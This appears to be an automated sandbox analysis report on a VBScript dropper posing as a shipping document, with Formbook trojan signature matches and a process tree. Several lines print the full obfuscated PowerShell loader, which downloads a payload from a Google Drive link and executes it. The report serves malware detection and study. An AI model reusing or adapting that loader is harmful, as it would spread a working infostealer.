Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202C12ED 12_2_202C12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2023B2C0 12_2_2023B2C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202D132D 12_2_202D132D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020D34C 12_2_2020D34C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202DA352 12_2_202DA352
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2026739A 12_2_2026739A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202E03E6 12_2_202E03E6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2022E3F0 12_2_2022E3F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202DF43F 12_2_202DF43F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20211460 12_2_20211460
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202D2446 12_2_202D2446
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202CE4F6 12_2_202CE4F6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20220535 12_2_20220535
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202D7571 12_2_202D7571
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202BD5B0 12_2_202BD5B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202E0591 12_2_202E0591
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2023C6E0 12_2_2023C6E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202D16CC 12_2_202D16CC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20220770 12_2_20220770
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20244750 12_2_20244750
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202DF7B0 12_2_202DF7B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2021C7C0 12_2_2021C7C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2028D800 12_2_2028D800
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20222840 12_2_20222840
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2022A840 12_2_2022A840
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202068B8 12_2_202068B8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202238E0 12_2_202238E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2024E8F0 12_2_2024E8F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20236962 12_2_20236962
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20229950 12_2_20229950
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2023B950 12_2_2023B950
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202229A0 12_2_202229A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202EA9A6 12_2_202EA9A6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20293A6C 12_2_20293A6C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202DFA49 12_2_202DFA49
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202D7A46 12_2_202D7A46
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20265AA0 12_2_20265AA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202BDAAC 12_2_202BDAAC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2021EA80 12_2_2021EA80
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202CDAC6 12_2_202CDAC6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202DFB76 12_2_202DFB76
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202DAB40 12_2_202DAB40
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2023FB80 12_2_2023FB80
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2025DBF9 12_2_2025DBF9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202D6BD7 12_2_202D6BD7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20299C32 12_2_20299C32
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20220C00 12_2_20220C00
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202C0CB5 12_2_202C0CB5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20210CF2 12_2_20210CF2
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202DFCF2 12_2_202DFCF2
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2022AD00 12_2_2022AD00
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202D7D73 12_2_202D7D73
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20223D40 12_2_20223D40
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202D1D5A 12_2_202D1D5A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20238DBF 12_2_20238DBF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2021ADE0 12_2_2021ADE0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2023FDC0 12_2_2023FDC0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202DEE26 12_2_202DEE26
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20220E59 12_2_20220E59
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20229EB0 12_2_20229EB0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20232E90 12_2_20232E90
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202DCE93 12_2_202DCE93
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202DEEDB 12_2_202DEEDB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20262F28 12_2_20262F28
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20240F30 12_2_20240F30
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202DFF09 12_2_202DFF09
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20294F40 12_2_20294F40
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202DFFB1 12_2_202DFFB1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20221F92 12_2_20221F92
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2022CFE0 12_2_2022CFE0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20212FC8 12_2_20212FC8
Found potential string decryption / allocating functions
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 20255130 appears 36 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 20267E54 appears 87 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 2028EA12 appears 84 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 2029F290 appears 105 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 2020B970 appears 266 times
Java / VBScript file with very long strings (likely obfuscated code)
Source: shipping document.vbs Initial sample: Strings found which are bigger than 50
Yara signature match
Source: amsi32_5852.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: 00000011.00000002.2753491610.00000000032F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000C.00000002.2249406825.00000000026D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000012.00000002.2755502958.0000000002150000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000C.00000002.2265395528.0000000021930000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000010.00000002.2754713283.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000011.00000002.2753361689.0000000003280000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000011.00000002.2752855309.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 6856, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 5852, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winVBS@22/10@6/4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Finindstillingernes119.Uni Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6396:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2ztt1tkp.iey.ps1 Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\shipping document.vbs"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6856
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5852
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Source: shipping document.vbs ReversingLabs: Detection: 31%
Source: shipping document.vbs Virustotal: Detection: 40%
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\shipping document.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Ricki = 1;$Gehenna='Substrin';$Gehenna+='g';Function Quillaia($Overbevokser){$Feasibilities=$Overbevokser.Length-$Ricki;For($Kompeni=5; $Kompeni -lt $Feasibilities; $Kompeni+=(6)){$Fortrnelse+=$Overbevokser.$Gehenna.Invoke($Kompeni, $Ricki);}$Fortrnelse;}function Standglas249($Babbittess){. ($Uti) ($Babbittess);}$Usheen=Quillaia ' S.bcM Autoo,roomzA,uatiPreenlUdspil emieaM.cov/Toakt5Ethno. Org,0Kille Het,r(EgetfW SelviNedrunSt nidva.ieogunvaw Brugsisbje propeNTidsfTAgter Stdta1Scale0Ma em.Spu.g0Rensn;A ver B,dedWUrpr,iWoundn Sprn6Hex n4Sub,e; c.to Az.mexSvine6k evr4 Non.;Perso Viruera,tndv Han,:Store1 horo2F ret1 oeme. opti0Inten)Skerr ForkrGSept,eSelebc histkLe,lio As,r/ Inhe2Tailz0Efter1.ndos0.euro0Overb1Bund 0,arav1Ore,t OperFL.udai SprurSto,ve,traafSlavio,earax .hot/ Udsu1 Eger2 Me.l1Krabd.Spinu0Maedt ';$Bogholdersker=Quillaia 'ForbiUOscilsadr.seGangwrBevat- h,ldATheurgPi kyeSemidnKrilrt Ly p ';$Fint=Quillaia 'NondihBlockt ReintEtmaapInsers Indf:Inter/defo /T pvodFryserUn aciTilb vSysseeExecr.Kurs gberr oAdfrdo Loo.gInconlAf aleGabes. .lotc Ant o SuccmGodhj/TermouMoun.cTermo?maletefo,grxNo.cupInconoCensur.ejebtBarra=apraxd pulvocohenwHan.knHol bl I.froCaseaaHyr,sdPol r&Ar,npiTrichdBestr= Gar,1Unmo oArbejD FugtjLsead9Univei Po,c8SubbabFilat8 egngBrnefDFu,le7Adspu4BordvVAr.hdU ockac.abenOGamel_Samme0Tiltrm PaynAArb.taF.rreRSkulkxUnmusSVildfOAn,ipZSmithj KorrE l,efISu.pkNU derBNucul5 Burm ';$Observandernes=Quillaia ' Gna >Stand ';$Uti=Quillaia 'DialaiM,ddeePr.dexNonex ';$Akkumulerede = Quillaia 'SkaffeNar,ocDatamhCathoou,ali Fanem%MedisaRetsgpAlligpEjersd ,maaaIndsttKomb a Meta%U,all\ LoenFWagneiTraktnTys,li PillnGinesd forssisoagt El viOve slFrilslArsh,iRetran KursgTeksteProkurUnifan Prece,eklasUd,ap1Wa,py1B tte9 Dext.ArikoU outpnAfkaliIdeal Ne,tb&F,rbi&Flamm ozaeeFiresc St,chfiguro lede Illog$Ulovm ';Standglas249 (Quillaia ' Cent$Amidog .luklY,ereogarnibRetrtaN,nirlUdate:org.nR echrerekinsPreapiKonjagHe nenMa.emeHogmorSlagte,appanpomeld.senseEgn,rsIn,ri=Ndraa( NatucF,jtimKunstd Bvre kants/ Un,oc Fic, Yemen$ Stv,AKravekTnneskKombiuFidusmlejrsuCardiltrykkeMinj rAccoueSkrivd doupeAroma)Pal,o ');Standglas249 (Quillaia ' Mask$Admirg R.shlQuarto Unrib S.deaDansel Fork: NummPReachrGlazef M.llaValgrbDiphtrGenkeiL.viskUnseneVugger,rnne=Learn$JernbFChalliKhevznUdsigtSkull. HressWolffp Un,rl UbndiStjertMa,ri(Tapet$Do,laORringb Ge,ts.nasseAk,usrRvhulvPanoraYnglen RecldFremfeZernerPsychn almueU.loosDispe)Ermel ');$Fint=$Prfabriker[0];Standglas249 (Quillaia ' Akti$actingUnderlJackpo Fidgb OptiaP mphl Pira: baanR Mde.eHejrepTilsla Lejei SkelnOve,dtuncomeCasanrderivsEti.l=FlskeNVo ubenoncuw Ho n- MethOVoldgbEf erjThyr,esen ocBin.itExtra S.cerS Egnsy Ide,sforkatHyrevemot vmchaut. UdslNBro zeHollytJuv l.GvestW ecome BrofbunlooCIncarl UdbyiFreere,aglynSpdbrtUdvik ');Standglas249 (Quillaia 'Psal.$,avshR .krieProtopTerroaCoyotiMovabnBej,st p
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Finindstillingernes119.Uni && echo $"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Ricki = 1;$Gehenna='Substrin';$Gehenna+='g';Function Quillaia($Overbevokser){$Feasibilities=$Overbevokser.Length-$Ricki;For($Kompeni=5; $Kompeni -lt $Feasibilities; $Kompeni+=(6)){$Fortrnelse+=$Overbevokser.$Gehenna.Invoke($Kompeni, $Ricki);}$Fortrnelse;}function Standglas249($Babbittess){. ($Uti) ($Babbittess);}$Usheen=Quillaia ' S.bcM Autoo,roomzA,uatiPreenlUdspil emieaM.cov/Toakt5Ethno. Org,0Kille Het,r(EgetfW SelviNedrunSt nidva.ieogunvaw Brugsisbje propeNTidsfTAgter Stdta1Scale0Ma em.Spu.g0Rensn;A ver B,dedWUrpr,iWoundn Sprn6Hex n4Sub,e; c.to Az.mexSvine6k evr4 Non.;Perso Viruera,tndv Han,:Store1 horo2F ret1 oeme. opti0Inten)Skerr ForkrGSept,eSelebc histkLe,lio As,r/ Inhe2Tailz0Efter1.ndos0.euro0Overb1Bund 0,arav1Ore,t OperFL.udai SprurSto,ve,traafSlavio,earax .hot/ Udsu1 Eger2 Me.l1Krabd.Spinu0Maedt ';$Bogholdersker=Quillaia 'ForbiUOscilsadr.seGangwrBevat- h,ldATheurgPi kyeSemidnKrilrt Ly p ';$Fint=Quillaia 'NondihBlockt ReintEtmaapInsers Indf:Inter/defo /T pvodFryserUn aciTilb vSysseeExecr.Kurs gberr oAdfrdo Loo.gInconlAf aleGabes. .lotc Ant o SuccmGodhj/TermouMoun.cTermo?maletefo,grxNo.cupInconoCensur.ejebtBarra=apraxd pulvocohenwHan.knHol bl I.froCaseaaHyr,sdPol r&Ar,npiTrichdBestr= Gar,1Unmo oArbejD FugtjLsead9Univei Po,c8SubbabFilat8 egngBrnefDFu,le7Adspu4BordvVAr.hdU ockac.abenOGamel_Samme0Tiltrm PaynAArb.taF.rreRSkulkxUnmusSVildfOAn,ipZSmithj KorrE l,efISu.pkNU derBNucul5 Burm ';$Observandernes=Quillaia ' Gna >Stand ';$Uti=Quillaia 'DialaiM,ddeePr.dexNonex ';$Akkumulerede = Quillaia 'SkaffeNar,ocDatamhCathoou,ali Fanem%MedisaRetsgpAlligpEjersd ,maaaIndsttKomb a Meta%U,all\ LoenFWagneiTraktnTys,li PillnGinesd forssisoagt El viOve slFrilslArsh,iRetran KursgTeksteProkurUnifan Prece,eklasUd,ap1Wa,py1B tte9 Dext.ArikoU outpnAfkaliIdeal Ne,tb&F,rbi&Flamm ozaeeFiresc St,chfiguro lede Illog$Ulovm ';Standglas249 (Quillaia ' Cent$Amidog .luklY,ereogarnibRetrtaN,nirlUdate:org.nR echrerekinsPreapiKonjagHe nenMa.emeHogmorSlagte,appanpomeld.senseEgn,rsIn,ri=Ndraa( NatucF,jtimKunstd Bvre kants/ Un,oc Fic, Yemen$ Stv,AKravekTnneskKombiuFidusmlejrsuCardiltrykkeMinj rAccoueSkrivd doupeAroma)Pal,o ');Standglas249 (Quillaia ' Mask$Admirg R.shlQuarto Unrib S.deaDansel Fork: NummPReachrGlazef M.llaValgrbDiphtrGenkeiL.viskUnseneVugger,rnne=Learn$JernbFChalliKhevznUdsigtSkull. HressWolffp Un,rl UbndiStjertMa,ri(Tapet$Do,laORringb Ge,ts.nasseAk,usrRvhulvPanoraYnglen RecldFremfeZernerPsychn almueU.loosDispe)Ermel ');$Fint=$Prfabriker[0];Standglas249 (Quillaia ' Akti$actingUnderlJackpo Fidgb OptiaP mphl Pira: baanR Mde.eHejrepTilsla Lejei SkelnOve,dtuncomeCasanrderivsEti.l=FlskeNVo ubenoncuw Ho n- MethOVoldgbEf erjThyr,esen ocBin.itExtra S.cerS Egnsy Ide,sforkatHyrevemot vmchaut. UdslNBro zeHollytJuv l.GvestW ecome BrofbunlooCIncarl UdbyiFreere,aglynSpdbrtUdvik ');Standglas249 (Quillaia 'Psal.$,avshR .krieProtopTerroaCoyotiMovabnBej,st p
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Finindstillingernes119.Uni && echo $"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe Process created: C:\Windows\SysWOW64\openfiles.exe "C:\Windows\SysWOW64\openfiles.exe"
Source: unknown Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: unknown Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Source: C:\Windows\SysWOW64\openfiles.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: unknown Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Ricki = 1;$Gehenna='Substrin';$Gehenna+='g';Function Quillaia($Overbevokser){$Feasibilities=$Overbevokser.Length-$Ricki;For($Kompeni=5; $Kompeni -lt $Feasibilities; $Kompeni+=(6)){$Fortrnelse+=$Overbevokser.$Gehenna.Invoke($Kompeni, $Ricki);}$Fortrnelse;}function Standglas249($Babbittess){. ($Uti) ($Babbittess);}$Usheen=Quillaia ' S.bcM Autoo,roomzA,uatiPreenlUdspil emieaM.cov/Toakt5Ethno. Org,0Kille Het,r(EgetfW SelviNedrunSt nidva.ieogunvaw Brugsisbje propeNTidsfTAgter Stdta1Scale0Ma em.Spu.g0Rensn;A ver B,dedWUrpr,iWoundn Sprn6Hex n4Sub,e; c.to Az.mexSvine6k evr4 Non.;Perso Viruera,tndv Han,:Store1 horo2F ret1 oeme. opti0Inten)Skerr ForkrGSept,eSelebc histkLe,lio As,r/ Inhe2Tailz0Efter1.ndos0.euro0Overb1Bund 0,arav1Ore,t OperFL.udai SprurSto,ve,traafSlavio,earax .hot/ Udsu1 Eger2 Me.l1Krabd.Spinu0Maedt ';$Bogholdersker=Quillaia 'ForbiUOscilsadr.seGangwrBevat- h,ldATheurgPi kyeSemidnKrilrt Ly p ';$Fint=Quillaia 'NondihBlockt ReintEtmaapInsers Indf:Inter/defo /T pvodFryserUn aciTilb vSysseeExecr.Kurs gberr oAdfrdo Loo.gInconlAf aleGabes. .lotc Ant o SuccmGodhj/TermouMoun.cTermo?maletefo,grxNo.cupInconoCensur.ejebtBarra=apraxd pulvocohenwHan.knHol bl I.froCaseaaHyr,sdPol r&Ar,npiTrichdBestr= Gar,1Unmo oArbejD FugtjLsead9Univei Po,c8SubbabFilat8 egngBrnefDFu,le7Adspu4BordvVAr.hdU ockac.abenOGamel_Samme0Tiltrm PaynAArb.taF.rreRSkulkxUnmusSVildfOAn,ipZSmithj KorrE l,efISu.pkNU derBNucul5 Burm ';$Observandernes=Quillaia ' Gna >Stand ';$Uti=Quillaia 'DialaiM,ddeePr.dexNonex ';$Akkumulerede = Quillaia 'SkaffeNar,ocDatamhCathoou,ali Fanem%MedisaRetsgpAlligpEjersd ,maaaIndsttKomb a Meta%U,all\ LoenFWagneiTraktnTys,li PillnGinesd forssisoagt El viOve slFrilslArsh,iRetran KursgTeksteProkurUnifan Prece,eklasUd,ap1Wa,py1B tte9 Dext.ArikoU outpnAfkaliIdeal Ne,tb&F,rbi&Flamm ozaeeFiresc St,chfiguro lede Illog$Ulovm ';Standglas249 (Quillaia ' Cent$Amidog .luklY,ereogarnibRetrtaN,nirlUdate:org.nR echrerekinsPreapiKonjagHe nenMa.emeHogmorSlagte,appanpomeld.senseEgn,rsIn,ri=Ndraa( NatucF,jtimKunstd Bvre kants/ Un,oc Fic, Yemen$ Stv,AKravekTnneskKombiuFidusmlejrsuCardiltrykkeMinj rAccoueSkrivd doupeAroma)Pal,o ');Standglas249 (Quillaia ' Mask$Admirg R.shlQuarto Unrib S.deaDansel Fork: NummPReachrGlazef M.llaValgrbDiphtrGenkeiL.viskUnseneVugger,rnne=Learn$JernbFChalliKhevznUdsigtSkull. HressWolffp Un,rl UbndiStjertMa,ri(Tapet$Do,laORringb Ge,ts.nasseAk,usrRvhulvPanoraYnglen RecldFremfeZernerPsychn almueU.loosDispe)Ermel ');$Fint=$Prfabriker[0];Standglas249 (Quillaia ' Akti$actingUnderlJackpo Fidgb OptiaP mphl Pira: baanR Mde.eHejrepTilsla Lejei SkelnOve,dtuncomeCasanrderivsEti.l=FlskeNVo ubenoncuw Ho n- MethOVoldgbEf erjThyr,esen ocBin.itExtra S.cerS Egnsy Ide,sforkatHyrevemot vmchaut. UdslNBro zeHollytJuv l.GvestW ecome BrofbunlooCIncarl UdbyiFreere,aglynSpdbrtUdvik ');Standglas249 (Quillaia 'Psal.$,avshR .krieProtopTerroaCoyotiMovabnBej,st p Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Finindstillingernes119.Uni && echo $" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Ricki = 1;$Gehenna='Substrin';$Gehenna+='g';Function Quillaia($Overbevokser){$Feasibilities=$Overbevokser.Length-$Ricki;For($Kompeni=5; $Kompeni -lt $Feasibilities; $Kompeni+=(6)){$Fortrnelse+=$Overbevokser.$Gehenna.Invoke($Kompeni, $Ricki);}$Fortrnelse;}function Standglas249($Babbittess){. ($Uti) ($Babbittess);}$Usheen=Quillaia ' S.bcM Autoo,roomzA,uatiPreenlUdspil emieaM.cov/Toakt5Ethno. Org,0Kille Het,r(EgetfW SelviNedrunSt nidva.ieogunvaw Brugsisbje propeNTidsfTAgter Stdta1Scale0Ma em.Spu.g0Rensn;A ver B,dedWUrpr,iWoundn Sprn6Hex n4Sub,e; c.to Az.mexSvine6k evr4 Non.;Perso Viruera,tndv Han,:Store1 horo2F ret1 oeme. opti0Inten)Skerr 